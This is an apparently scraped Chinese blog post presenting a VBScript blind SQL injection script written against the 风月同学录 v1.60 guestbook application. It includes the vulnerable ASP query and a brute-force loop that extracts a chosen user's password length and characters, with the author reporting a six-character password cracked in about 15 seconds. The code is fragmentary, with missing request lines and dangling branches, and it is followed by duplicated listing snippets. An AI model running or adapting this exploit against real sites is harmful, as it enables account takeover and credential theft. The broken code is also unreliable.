...
topicid=request("rootid")
sql="select topic,hits from bbs
where parentid=0 and bbsid="&topicid
set rs=conn.execute(sql)
...
非常古老且經典的乙個,呵呵,試了下:
資料表結構我都知道,使用者名稱也都可以在使用者列表看出來,那麼這個例子就演示一下猜解密碼,什麼?太簡單了?只是個例子嘛,別笑哦~~寫的時候也不是一帆風順~~寫的很差,尤其迴圈裡如果探測到正確的就應該退出迴圈,但是想不起來怎麼退出了(break?exit?),不過對於這個密碼明文存放的程式來說已經夠了,乙個6位的密碼用了15秒左右猜出,改進下會提高不少,但效率上始終和perl不能比了。
要使用這個物件要裝microsoft act是visual studio.net裡乙個工具,我在另一台機器上直接用regsrv32註冊相關的dll失敗了,所以還是要裝一下。
*********************************************
風月同學錄v1.60漏洞測試指令碼 by luoluo
注意:需要裝visual studio.net裡的act工具
*********************************************
option explicit
on error resume next
dim test
dim o_response
dim wrong
dim i,j,k
dim pwd_len
dim pwd
dim strings
dim username
從命令列得到要破解的人的使用者名稱
if wscript.arguments.count > 0 then
username = wscript.arguments(0)
else
username = "luoluo"
end if
wscript.echo "開始探測,請等待... ..."
正確頁面的標誌,這個隨便找的,因為只要是兩個頁面返回的不同部分就可以了
wrong = "luoluoisachinesehacker"
存放密碼
pwd = ""
密碼的字元範圍
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
建立物件
set test = createobject("act.test")
得到使用者的密碼的長度
for i = 0 to 128 step 1
傳送請求,返回乙個response物件,位址長可以用&分成段,那樣好看一些
如果返回的頁面裡有正確標誌那麼長度就對了
if instr(o_response.body, wrong) <> 0 then
pwd_len = "" & i & ""
end if
next
猜解使用者的密碼
wscript.echo "錯誤:" & error.description
error.clear
else
輸出密碼
wscript.echo "密碼:" & pwd
end if
set test = nothing
用vbs來寫sql注入等80埠的攻擊指令碼
topicid request rootid sql select topic,hits from bbs where parentid 0 and bbsid topicid set rs conn.execute sql 非常古老且經典的乙個,呵呵,試了下 showthread.asp?root...
用vbs來寫sql注入等80埠的攻擊指令碼
topicid request rootid sql select topic,hits from bbs where parentid 0 and bbsid topicid set rs conn.execute sql 非常古老且經典的乙個,呵呵,試了下 showthread.asp?root...
sql盲注特點 SQL盲注
盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...